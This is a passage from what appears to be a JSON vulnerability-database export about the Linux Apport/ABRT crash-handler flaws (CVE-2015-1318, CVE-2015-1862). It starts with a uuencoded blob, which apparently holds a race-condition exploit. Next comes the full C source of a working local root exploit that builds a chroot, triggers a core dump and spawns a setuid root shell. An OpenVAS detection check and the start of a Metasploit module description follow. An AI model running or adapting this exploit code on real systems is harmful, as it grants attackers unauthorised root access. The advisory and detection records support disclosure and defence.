\nM\"B\\O\"B\\O(%1H:7,@:7,@82!R86-E(&-O;F1I=&EO;B!E>'!L;VET(&9O<B!# \nM5D4M,C`Q-2TQ.#8R+\"!T87)G971I;F<@1F5D;W)A+@HO+PHO+R!.;W1E.B!) \nM=\"!C86X@=&%K92!A(&9E=R!M:6YU=&5S('1O('=I;B!T:&4@<F%C92!C;VYD \nM:71I;VXN\"B\\O\"B\\O(\"`@+2T@=&%V:7-O0&-M<'AC:&<X8BYC;VTL($%P<FEL \nM(#(P,34N\"B\\O\"B\\O(\"0@8V%T(\"]E=&,O9F5D;W)A+7)E;&5A<V4@\"B\\O($9E \nM9&]R82!R96QE87-E(#(Q(\"A4=V5N='D@3VYE*0HO+R`D(\"XO82YO=70@+V5T \nM8R]P87-S=V0*+R\\@6R!W86ET(&$@9F5W(&UI;G5T97,@70HO+R!$971E8W1E \nM9\"!C8W!P+3(P,34M,#0M,3,M,C$Z-30Z-#,M,30Q.#,N;F5W+\"!A='1E;7!T \nM:6YG('1O(')A8V4N+BX*+R\\@(\"`@($1I9&XG=\"!W:6XL('1R>6EN9R!A9V%I \nM;B$*+R\\@1&5T96-T960@8V-P<\"TR,#$U+3`T+3$S+3(Q.C4T.C0S+3$T,3@V \nM+FYE=RP@871T96UP=&EN9R!T;R!R86-E+BXN\"B\\O(\"`@(\"!$:61N)W0@=VEN \nM+\"!T<GEI;F<@86=A:6XA\"B\\O($1E=&5C=&5D(&-C<'`M,C`Q-2TP-\"TQ,RTR \nM,3HU-#HT,RTQ-#$Y,2YN97<L(&%T=&5M<'1I;F<@=&\\@<F%C92XN+@HO+R`@ \nM(\"`@1&ED;B=T('=I;BP@=')Y:6YG(&%G86EN(0HO+R!$971E8W1E9\"!C8W!P \nM+3(P,34M,#0M,3,M,C$Z-30Z-#,M,30Q.34N;F5W+\"!A='1E;7!T:6YG('1O \nM(')A8V4N+BX*+R\\@(\"`@($1I9&XG=\"!W:6XL('1R>6EN9R!A9V%I;B$*+R\\@ \nM1&5T96-T960@8V-P<\"TR,#$U+3`T+3$S+3(Q.C4T.C0S+3$T,3DX+FYE=RP@ \nM871T96UP=&EN9R!T;R!R86-E+BXN\"B\\O(\"`@(\"!%>'!L;VET('-U8V-E<W-F \nM=6PN+BX*+R\\@+7)W+7(M+7(M+2X@,2!T879I<V\\@86)R=\"`Q-S4Q(%-E<\"`R \nM-B`@,C`Q-\"`O971C+W!A<W-W9`HO+PH*<W1A=&EC(&-O;G-T(&-H87(@:T%B \nM<G10<F5F:7A;72`](\"(O=F%R+W1M<\"]A8G)T+R([\"G-T871I8R!C;VYS=\"!S \nM:7IE7W0@:TUA>$5V96YT0G5F(#T@.#$Y,CL*<W1A=&EC(&-O;G-T('-I>F5? \nM=\"!K56YL:6YK071T96UP=',@/2`X,3DR(\"H@,CL*<W1A=&EC(&-O;G-T(&EN \nM=\"!K0W)A<VA$96QA>2`](#$P,#`P.PH*<W1A=&EC('!I9%]T(&-R96%T95]A \nM8G)T7V5V96YT<RAC;VYS=\"!C:&%R(\"IN86UE*3L*\"FEN=\"!M86EN*&EN=\"!A \nM<F=C+\"!C:&%R(\"HJ87)G=BD*>PH@(\"`@:6YT(&9D+\"!I.PH@(\"`@:6YT('=A \nM=&-H.PH@(\"`@<&ED7W0@8VAI;&0[\"B`@(\"!S=')U8W0@<W1A=\"!S=&%T8G5F \nM.PH@(\"`@<W1R=6-T(&EN;W1I9GE?979E;G0@*F5V.PH@(\"`@8VAA<B`J979E \nM;G1B=68@/2!A;&QO8V$H:TUA>$5V96YT0G5F*3L*(\"`@('-S:7IE7W0@<VEZ \nM93L*\"B`@(\"`O+R!&:7)S=\"!A<F=U;65N=\"!I<R!T:&4@9FEL96YA;64@=7-E \nM<B!W86YT<R!U<R!T;R!C:&]W;B@I+@H@(\"`@:68@*&%R9V,@(3T@,BD@>PH@ \nM(\"`@(\"`@(&5R<G@H15A)5%]&04E,55)%+\"`B<&QE87-E('-P96-I9GD@9FEL \nM96YA;64@=&\\@8VAO=VX@*&4N9RX@+V5T8R]P87-S=V0I(BD[\"B`@(\"!]\"@H@ \nM(\"`@+R\\@5&AI<R!I<R!R97%U:7)E9\"!A<R!W92!N965D('1O(&UA:V4@9&EF \nM9F5R96YT(&-O;6T@;F%M97,@=&\\@879O:60*(\"`@(\"\\O('1R:6=G97)I;F<@ \nM86)R=\"!R871E(&QI;6ET:6YG+\"!S;R!W92!F;W)K*\"DO97AE8W9E*\"D@9&EF \nM9F5R96YT(&YA;65S+@H@(\"`@:68@*'-T<F-M<\"AA<F=V6S%=+\"`B8W)A<V@B \nM*2`]/2`P*2![\"B`@(\"`@(\"`@7U]B=6EL=&EN7W1R87`H*3L*(\"`@('T*\"B`@ \nM(\"`O+R!3971U<\"!I;F]T:69Y+\"!A;F0@861D(&$@=V%T8V@@;VX@=&AE(&%B \nM<G0@9&ER96-T;W)Y+@H@(\"`@:68@*\"AF9\"`](&EN;W1I9GE?:6YI=\"@I*2`\\ \nM(#`I('L*(\"`@(\"`@(\"!E<G(H15A)5%]&04E,55)%+\"`B=6YA8FQE('1O(&EN \nM:71I86QI>F4@:6YO=&EF>2(I.PH@(\"`@?0H*(\"`@(&EF(\"@H=V%T8V@@/2!I \nM;F]T:69Y7V%D9%]W871C:\"AF9\"P@:T%B<G10<F5F:7@L($E.7T-214%412DI \nM(#P@,\"D@>PH@(\"`@(\"`@(&5R<BA%6$E47T9!24Q54D4L(\")F86EL960@=&\\@ \nM8W)E871E(&YE=R!W871C:\"!D97-C<FEP=&]R(BD[\"B`@(\"!]\"@H@(\"`@+R\\@ \nM4W1A<G0@8V%U<VEN9R!C<F%S:&5S('-O('1H870@86)R=\"!G96YE<F%T97,@ \nM<F5P;W)T<RX*(\"`@(&EF(\"@H8VAI;&0@/2!C<F5A=&5?86)R=%]E=F5N=',H \nM*F%R9W8I*2`]/2`M,2D@>PH@(\"`@(\"`@(&5R<BA%6$E47T9!24Q54D4L(\")F \nM86EL960@=&\\@9V5N97)A=&4@86)R=\"!R97!O<G1S(BD[\"B`@(\"!]\"@H@(\"`@ \nM+R\\@3F]W('-T87)T('!R;V-E<W-I;F<@:6YO=&EF>2!E=F5N=',N\"B`@(\"!W \nM:&EL92`H*'-I>F4@/2!R96%D*&9D+\"!E=F5N=&)U9BP@:TUA>$5V96YT0G5F \nM*2D@/B`P*2![\"@H@(\"`@(\"`@(\"\\O(%=E(&-A;B!R96-E:79E(&UU;'1I<&QE \nM(&5V96YT<R!P97(@<F5A9\"P@<V\\@8VAE8VL@96%C:\"!O;F4N\"B`@(\"`@(\"`@ \nM9F]R(\"AE=B`](&5V96YT8G5F.R!E=B`\\(&5V96YT8G5F(\"L@<VEZ93L@978@ \nM/2`F978M/FYA;65;978M/FQE;ETI('L*(\"`@(\"`@(\"`@(\"`@8VAA<B!D:7)N \nM86UE6TY!345?34%873L*(\"`@(\"`@(\"`@(\"`@8VAA<B!M87!S;F%M95M.04U% \nM7TU!6%T[\"B`@(\"`@(\"`@(\"`@(&-H87(@8V]M;6%N9%LQ,#(T73L*\"B`@(\"`@ \nM(\"`@(\"`@(\"\\O($EF('1H:7,@:7,@82!N97<@8V-P<\"!R97!O<G0L('=E(&-A \nM;B!S=&%R=\"!T<GEI;F<@=&\\@<F%C92!I=\"X*(\"`@(\"`@(\"`@(\"`@:68@*'-T \nM<FYC;7`H978M/FYA;64L(\")C8W!P(BP@-\"D@(3T@,\"D@>PH@(\"`@(\"`@(\"`@ \nM(\"`@(\"`@8V]N=&EN=64[\"B`@(\"`@(\"`@(\"`@('T*\"B`@(\"`@(\"`@(\"`@(\"\\O \nM($-O;G-T<G5C=\"!P871H;F%M97,N\"B`@(\"`@(\"`@(\"`@('-T<FYC<'DH9&ER \nM;F%M92P@:T%B<G10<F5F:7@L('-I>F5O9B!D:7)N86UE*3L*(\"`@(\"`@(\"`@ \nM(\"`@<W1R;F-A=\"AD:7)N86UE+\"!E=BT^;F%M92P@<VEZ96]F(&1I<FYA;64I \nM.PH*(\"`@(\"`@(\"`@(\"`@<W1R;F-P>2AM87!S;F%M92P@9&ER;F%M92P@<VEZ \nM96]F(&1I<FYA;64I.PH@(\"`@(\"`@(\"`@(\"!S=')N8V%T*&UA<'-N86UE+\"`B \nM+VUA<',B+\"!S:7IE;V8@;6%P<VYA;64I.PH*(\"`@(\"`@(\"`@(\"`@9G!R:6YT \nM9BAS=&1E<G(L(\")$971E8W1E9\"`E<RP@871T96UP=&EN9R!T;R!R86-E+BXN \nM7&XB+\"!E=BT^;F%M92D[\"@H@(\"`@(\"`@(\"`@(\"`O+R!#:&5C:R!I9B!W92!N \nM965D('1O('=A:70@9F]R('1H92!N97AT(&5V96YT(&]R(&YO=\"X*(\"`@(\"`@ \nM(\"`@(\"`@=VAI;&4@*&%C8V5S<RAD:7)N86UE+\"!&7T]+*2`]/2`P*2![\"B`@ \nM(\"`@(\"`@(\"`@(\"`@(\"!F;W(@*&D@/2`P.R!I(#P@:U5N;&EN:T%T=&5M<'1S \nM.R!I*RLI('L*(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`O+R!792!N965D('1O('5N \nM;&EN:R@I(&%N9\"!S>6UL:6YK*\"D@=&AE(&9I;&4@=&\\@=VEN+@H@(\"`@(\"`@ \nM(\"`@(\"`@(\"`@(\"`@(&EF(\"AU;FQI;FLH;6%P<VYA;64I(\"$](#`I('L*(\"`@ \nM(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@8V]N=&EN=64[\"B`@(\"`@(\"`@(\"`@(\"`@ \nM(\"`@(\"`@?0H*(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`O+R!792!W;VX@=&AE(&9I \nM<G-T(')A8V4L(&YO=R!A='1E;7!T('1O('=I;B!T:&4*(\"`@(\"`@(\"`@(\"`@ \nM(\"`@(\"`@(\"`O+R!S96-O;F0@<F%C92XN+BX*(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@ \nM(\"!I9B`H<WEM;&EN:RAA<F=V6S%=+\"!M87!S;F%M92D@(3T@,\"D@>PH@(\"`@ \nM(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"!B<F5A:SL*(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@ \nM(\"!]\"@H@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"\\O(%1H:7,@;&]O:W,@9V]O9\"P@ \nM8G5T(&1O97-N)W0@;65A;B!W92!W;VXL(&ET)W,@<&]S<VEB;&4*(\"`@(\"`@ \nM(\"`@(\"`@(\"`@(\"`@(\"`O+R!C:&]W;B@I(&UI9VAT(&AA=F4@:&%P<&5N960@ \nM=VAI;&4@=&AE(&9I;&4@=V%S('5N;&EN:V5D+@H@(\"`@(\"`@(\"`@(\"`@(\"`@ \nM(\"`@(\"\\O\"B`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@+R\\@1VEV92!I=\"!A(&9E=R!M \nM:6-R;W-E8V]N9',@=&\\@<G5N(&-H;W=N*\"DN+BYJ=7-T(&EN(&-A<V4*(\"`@ \nM(\"`@(\"`@(\"`@(\"`@(\"`@(\"`O+R!W92!D:60@=VEN+@H@(\"`@(\"`@(\"`@(\"`@ \nM(\"`@(\"`@('5S;&5E<\"@Q,\"D[\"@H@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(&EF(\"AS \nM=&%T*&%R9W9;,5TL(\"9S=&%T8G5F*2`A/2`P*2![\"B`@(\"`@(\"`@(\"`@(\"`@ \nM(\"`@(\"`@(\"`@(&5R<G@H15A)5%]&04E,55)%+\"`B=6YA8FQE('1O('-T870@ \nM=&%R9V5T(&9I;&4@)7,B+\"!A<F=V6S%=*3L*(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@ \nM(\"!]\"@H@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(&EF(\"AS=&%T8G5F+G-T7W5I9\"`A \nM/2!G971U:60H*2D@>PH@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"!B<F5A:SL* \nM(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"!]\"@H@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(&9P \nM<FEN=&8H<W1D97)R+\"`B7'1%>'!L;VET('-U8V-E<W-F=6PN+BY<;B(I.PH* \nM(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`O+R!792=R92!T:&4@;F5W(&]W;F5R+\"!R \nM=6X@;',@+6P@=&\\@<VAO=R!U<V5R+@H@(\"`@(\"`@(\"`@(\"`@(\"`@(\"`@('-P \nM<FEN=&8H8V]M;6%N9\"P@(FQS(\"UL(\"5S(BP@87)G=ELQ72D[\"B`@(\"`@(\"`@ \nM(\"`@(\"`@(\"`@(\"`@<WES=&5M*&-O;6UA;F0I.PH*(\"`@(\"`@(\"`@(\"`@(\"`@ \nM(\"`@(\"!R971U<FX@15A)5%]354-#15-3.PH@(\"`@(\"`@(\"`@(\"`@(\"`@?0H@ \nM(\"`@(\"`@(\"`@(\"!]\"@H@(\"`@(\"`@(\"`@(\"!F<')I;G1F*'-T9&5R<BP@(EQT \nM1&ED;B=T('=I;BP@=')Y:6YG(&%G86EN(5QN(BD[\"B`@(\"`@(\"`@?0H@(\"`@ \nM?0H*(\"`@(&5R<BA%6$E47T9!24Q54D4L(\")F86EL960@=&\\@<F5A9\"!I;F]T \nM:69Y(&5V96YT(BD[\"GT*\"B\\O(%1H:7,@<F]U=&EN92!A='1E;7!T<R!T;R!G \nM96YE<F%T92!N97<@86)R=\"!E=F5N=',N(%=E(&-A;B=T(&IU<W0@8W)A<V@L \nM\"B\\O(&)E8V%U<V4@86)R=\"!S86YE;'D@=')I97,@=&\\@<F%T92!L:6UI=\"!R \nM97!O<G0@8W)E871I;VXL('-O('=E(&YE960@82!N97<*+R\\@8V]M;2!N86UE \nM(&9O<B!E86-H(&-R87-H+@IS=&%T:6,@<&ED7W0@8W)E871E7V%B<G1?979E \nM;G1S*&-O;G-T(&-H87(@*FYA;64I\"GL*(\"`@(&-H87(@*FYE=VYA;64[\"B`@ \nM(\"!I;G0@<W1A='5S.PH@(\"`@<&ED7W0@8VAI;&0L('!I9#L*\"B`@(\"`O+R!# \nM<F5A=&4@82!C:&EL9\"!P<F]C97-S('1O(&=E;F5R871E(&5V96YT<RX*(\"`@ \nM(&EF(\"@H8VAI;&0@/2!F;W)K*\"DI(\"$](#`I\"B`@(\"`@(\"`@<F5T=7)N(&-H \nM:6QD.PH*(\"`@(\"\\O($UA:V4@<W5R92!W92!S=&]P('=H96X@<&%R96YT(&1I \nM97,N\"B`@(\"!P<F-T;\"A04E]3151?4$1%051(4TE'+\"!324=+24Q,*3L*\"B`@ \nM(\"!W:&EL92`H=')U92D@>PH@(\"`@(\"`@(\"\\O($-H;V]S92!A(&YE=R!U;G5S \nM960@9FEL96YA;64*(\"`@(\"`@(\"!N97=N86UE(#T@=&UP;F%M*#`I.PH*(\"`@ \nM(\"`@(\"`O+R!-86ME('-U<F4@=V4G<F4@;F]T('1O;R!F87-T+@H@(\"`@(\"`@ \nM('5S;&5E<\"AK0W)A<VA$96QA>2D[\"@H@(\"`@(\"`@(\"\\O($-R96%T92!A(&YE \nM=R!C<F%S:&EN9R!S=6)P<F]C97-S+@H@(\"`@(\"`@(&EF(\"@H<&ED(#T@9F]R \nM:R@I*2`]/2`P*2![\"B`@(\"`@(\"`@(\"`@(&EF(\"AL:6YK*&YA;64L(&YE=VYA \nM;64I(\"$](#`I('L*(\"`@(\"`@(\"`@(\"`@(\"`@(&5R<BA%6$E47T9!24Q54D4L \nM(\")F86EL960@=&\\@8W)E871E(&$@;F5W(&5X96YA;64B*3L*(\"`@(\"`@(\"`@ \nM(\"`@?0H*(\"`@(\"`@(\"`@(\"`@+R\\@17AE8W5T92!C<F%S:&EN9R!P<F]C97-S \nM+@H@(\"`@(\"`@(\"`@(\"!E>&5C;\"AN97=N86UE+\"!N97=N86UE+\"`B8W)A<V@B \nM+\"!.54Q,*3L*\"B`@(\"`@(\"`@(\"`@(\"\\O(%1H:7,@<VAO=6QD(&%L=V%Y<R!W \nM;W)K+@H@(\"`@(\"`@(\"`@(\"!E<G(H15A)5%]&04E,55)%+\"`B=6YE>'!E8W1E \nM9\"!E>&5C=F4@9F%I;'5R92(I.PH@(\"`@(\"`@('T*\"B`@(\"`@(\"`@+R\\@4F5A \nM<\"!C<F%S:&5D('-U8G!R;V-E<W,N\"B`@(\"`@(\"`@:68@*'=A:71P:60H<&ED \nM+\"`F<W1A='5S+\"`P*2`A/2!P:60I('L*(\"`@(\"`@(\"`@(\"`@97)R*$58251? \nM1D%)3%5212P@(G=A:71P:60@9F%I;'5R92(I.PH@(\"`@(\"`@('T*\"B`@(\"`@ \nM(\"`@+R\\@0VQE86X@=7`@=&AE('1E;7!O<F%R>2!N86UE+@H@(\"`@(\"`@(&EF \nM(\"AU;FQI;FLH;F5W;F%M92D@(3T@,\"D@>PH@(\"`@(\"`@(\"`@(\"!E<G(H15A) \nM5%]&04E,55)%+\"`B9F%I;&5D('1O(&-L96%N('5P(BD[\"B`@(\"`@(\"`@?0H* \nM(\"`@(\"`@(\"`O+R!-86ME('-U<F4@:70@8W)A<VAE9\"!A<R!E>'!E8W1E9\"X* \nM(\"`@(\"`@(\"!I9B`H(5=)1E-)1TY!3$5$*'-T871U<RDI('L*(\"`@(\"`@(\"`@ \nM(\"`@97)R>\"A%6$E47T9!24Q54D4L(\")S;VUE=&AI;F<@=V5N=\"!W<F]N9R(I \nG.PH@(\"`@(\"`@('T*(\"`@('T*\"B`@(\"!R971U<FX@8VAI;&0[\"GT* \n` \nend \n \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131429/apportabrt-issues.txt"}, {"lastseen": "2016-12-05T22:17:18", "description": "", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "packetstorm", "title": "Linux Apport/Abrt Local Root Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1318", "CVE-2015-1862"], "modified": "2015-04-15T00:00:00", "id": "PACKETSTORM:131423", "href": "https://packetstormsecurity.com/files/131423/Linux-Apport-Abrt-Local-Root-Exploit.html", "sourceData": "`#define _GNU_SOURCE \n#include <stdio.h> \n#include <unistd.h> \n#include <stdlib.h> \n#include <fcntl.h> \n#include <signal.h> \n#include <elf.h> \n#include <err.h> \n#include <syslog.h> \n#include <sched.h> \n#include <linux/sched.h> \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <sys/auxv.h> \n#include <sys/wait.h> \n \n# warning this file must be compiled with -static \n \n// \n// Apport/Abrt Vulnerability Demo Exploit. \n// \n// Apport: CVE-2015-1318 \n// Abrt: CVE-2015-1862 \n// \n// -- taviso@cmpxchg8b.com, April 2015. \n// \n// $ gcc -static newpid.c \n// $ ./a.out \n// uid=0(root) gid=0(root) groups=0(root) \n// sh-4.3# exit \n// exit \n// \n// Hint: To get libc.a, \n// yum install glibc-static or apt-get install libc6-dev \n// \n \nint main(int argc, char **argv) \n{ \nint status; \nElf32_Phdr *hdr; \npid_t wrapper; \npid_t init; \npid_t subprocess; \nunsigned i; \n \n// Verify this is a static executable by checking the program headers for a \n// dynamic segment. Originally I thought just checking AT_BASE would work, \n// but that isnt reliable across many kernels. \nhdr = (void *) getauxval(AT_PHDR); \n \n// If we find any PT_DYNAMIC, then this is probably not a static binary. \nfor (i = 0; i < getauxval(AT_PHNUM); i++) { \nif (hdr[i].p_type == PT_DYNAMIC) { \nerrx(EXIT_FAILURE, \"you *must* compile with -static\"); \n} \n} \n \n// If execution reached here, it looks like we're a static executable. If \n// I'm root, then we've convinced the core handler to run us, so create a \n// setuid root executable that can be used outside the chroot. \nif (getuid() == 0) { \nif (chown(\"sh\", 0, 0) != 0) \nexit(EXIT_FAILURE); \n \nif (chmod(\"sh\", 04755) != 0) \nexit(EXIT_FAILURE); \n \nreturn EXIT_SUCCESS; \n} \n \n// If I'm not root, but euid is 0, then the exploit worked and we can spawn \n// a shell and cleanup. \nif (setuid(0) == 0) { \nsystem(\"id\"); \nsystem(\"rm -rf exploit\"); \nexeclp(\"sh\", \"sh\", NULL); \n \n// Something went wrong. \nerr(EXIT_FAILURE, \"failed to spawn root shell, but exploit worked\"); \n} \n \n// It looks like the exploit hasn't run yet, so create a chroot. \nif (mkdir(\"exploit\", 0755) != 0 \n|| mkdir(\"exploit/usr\", 0755) != 0 \n|| mkdir(\"exploit/usr/share\", 0755) != 0 \n|| mkdir(\"exploit/usr/share/apport\", 0755) != 0 \n|| mkdir(\"exploit/usr/libexec\", 0755) != 0) { \nerr(EXIT_FAILURE, \"failed to create chroot directory\"); \n} \n \n// Create links to the exploit locations we need. \nif (link(*argv, \"exploit/sh\") != 0 \n|| link(*argv, \"exploit/usr/share/apport/apport\") != 0 // Ubuntu \n|| link(*argv, \"exploit/usr/libexec/abrt-hook-ccpp\") != 0) { // Fedora \nerr(EXIT_FAILURE, \"failed to create required hard links\"); \n} \n \n// Create a subprocess so we don't enter the new namespace. \nif ((wrapper = fork()) == 0) { \n \n// In the child process, create a new pid and user ns. The pid \n// namespace is only needed on Ubuntu, because they check for %P != %p \n// in their core handler. On Fedora, just a user ns is sufficient. \nif (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0) \nerr(EXIT_FAILURE, \"failed to create new namespace\"); \n \n// Create a process in the new namespace. \nif ((init = fork()) == 0) { \n \n// Init (pid 1) signal handling is special, so make a subprocess to \n// handle the traps. \nif ((subprocess = fork()) == 0) { \n// Change /proc/self/root, which we can do as we're privileged \n// within the new namepace. \nif (chroot(\"exploit\") != 0) { \nerr(EXIT_FAILURE, \"chroot didnt work\"); \n} \n \n// Now trap to get the core handler invoked. \n__builtin_trap(); \n \n// Shouldn't happen, unless user is ptracing us or something. \nerr(EXIT_FAILURE, \"coredump failed, were you ptracing?\"); \n} \n \n// If the subprocess exited with an abnormal signal, then everything worked. \nif (waitpid(subprocess, &status, 0) == subprocess) \nreturn WIFSIGNALED(status) \n? EXIT_SUCCESS \n: EXIT_FAILURE; \n \n// Something didn't work. \nreturn EXIT_FAILURE; \n} \n \n// The new namespace didn't work. \nif (waitpid(init, &status, 0) == init) \nreturn WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS \n? EXIT_SUCCESS \n: EXIT_FAILURE; \n \n// Waitpid failure. \nreturn EXIT_FAILURE; \n} \n \n// If the subprocess returned sccess, the exploit probably worked, reload \n// with euid zero. \nif (waitpid(wrapper, &status, 0) == wrapper) { \n// All done, spawn root shell. \nif (WIFEXITED(status) && WEXITSTATUS(status) == 0) { \nexecl(*argv, \"w00t\", NULL); \n} \n} \n \n// Unknown error. \nerrx(EXIT_FAILURE, \"unexpected result, cannot continue\"); \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131423/apportabrt-exec.txt"}], "openvas": [{"lastseen": "2019-05-29T18:36:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for apport USN-2569-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1318"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842169", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842169", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for apport USN-2569-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842169\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-15 07:23:07 +0200 (Wed, 15 Apr 2015)\");\n script_cve_id(\"CVE-2015-1318\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for apport USN-2569-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apport'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"St&#233 phane Graber and Tavis Ormandy\nindependently discovered that Apport incorrectly handled the crash reporting\nfeature. A local attacker could use this issue to gain elevated privileges.\");\n script_tag(name:\"affected\", value:\"apport on Ubuntu 14.10,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2569-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2569-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apport\", ver:\"2.14.7-0ubuntu8.3\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apport\", ver:\"2.14.1-0ubuntu3.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-11-02T05:15:18", "description": "This module attempts to gain root privileges on Linux systems by invoking the default coredump handler inside a namespace (\"container\"). Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing `usr/share/apport/apport` within the crashed task's directory to be executed. Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be executed. In both instances, the crash handler does not drop privileges, resulting in code execution as root. This module has been tested successfully on Apport 2.14.1 on Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.\n", "cvss3": {}, "published": "2018-01-14T08:33:43", "type": "metasploit", "title": "Apport / ABRT chroot Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1318"], "modified": "2021-07-08T13:03:42", "id": "MSF:EXPLOIT-LINUX-LOCAL-APPORT_ABRT_CHROOT_PRIV_ESC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/apport_abrt_chroot_priv_esc/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apport / ABRT chroot Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges on Linux systems by\n invoking the default coredump handler inside a namespace (\"container\").\n\n Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are\n vulnerable, due to a feature which allows forwarding reports to\n a container's Apport by changing the root directory before loading\n the crash report, causing `usr/share/apport/apport` within the crashed\n task's directory to be executed.\n\n Similarly, Fedora is vulnerable when the kernel crash handler is\n configured to change root directory before executing ABRT, causing\n `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be\n executed.\n\n In both instances, the crash handler does not drop privileges,\n resulting in code execution as root.\n\n This module has been tested successfully on Apport 2.14.1 on\n Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'St\u00e9phane Graber', # Independent discovery, PoC and patch\n 'Tavis Ormandy', # Independent discovery and C exploit\n 'Ricardo F. Teixeira', # shell exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2015-03-31',\n 'Platform' => [ 'linux' ],\n 